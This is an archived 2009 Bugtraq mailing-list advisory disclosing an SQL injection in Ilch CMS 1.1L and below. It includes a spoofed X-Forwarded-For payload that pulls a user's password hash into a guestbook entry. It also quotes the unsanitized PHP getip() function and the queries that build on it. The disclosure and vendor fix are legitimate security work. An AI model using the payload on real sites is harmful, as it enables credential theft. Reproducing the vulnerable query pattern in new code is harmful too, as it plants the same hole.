lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <op.uoxxhbip6a20rp@license.ntitles.net>
Date: Fri, 06 Feb 2009 18:28:13 +0100
From: Gizmore <gizmore@...hall.net>
To: bugtraq@...urityfocus.com
Subject: Vulnerable: Ilch CMS

Ilch CMS (from http://ilch.de) is vulnerable to sql-injection

Prone to the vulnerabilty are the guestbook and the statistics.

- Affected Versions: ilch 1.1L and below
- Not vulnerable: ilch 1.1M

- Exploit: Spoof your x-forwarded-for header to:

            127.0.0.1', (select `pass` from prefix_user WHERE `id` > 0  
ORDER BY `id` LIMIT 1)) /*

            Then create a guestbook entry.

- Timeline:
     3.Feb.09: Vuln reported to ilch.de
     3.Feb.09: Got reply from ilch
     4.Feb.09: Version 1.1M is available which fixes the issue



Here is a summary of the vulnerability:

# in include/includes/func/statistics.php is missing user input  
sanitization:

function getip() {
   if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {
      return ($_SERVER["HTTP_X_FORWARDED_FOR"]);
   } else {
      return ($_SERVER["REMOTE_ADDR"]);
   }
}

# in include/contents/gbook.php getip() is used without validation

db_query("INSERT INTO prefix_gbook  
(`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES ('".$name."', '".$mail."',  
'".$page."', '".time()."', '".getip()."', '".$txt."')");

# There is also getip() used in includes/func/user.php, but its way harder  
to exploit:

db_query("INSERT INTO prefix_online (sid,uptime,ipa) VALUES  
('".session_id()."',now(),'".getip()."')");



Please credit the discovery to Gizmore from wechall.net :)

Kind Regards
Gizmore

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ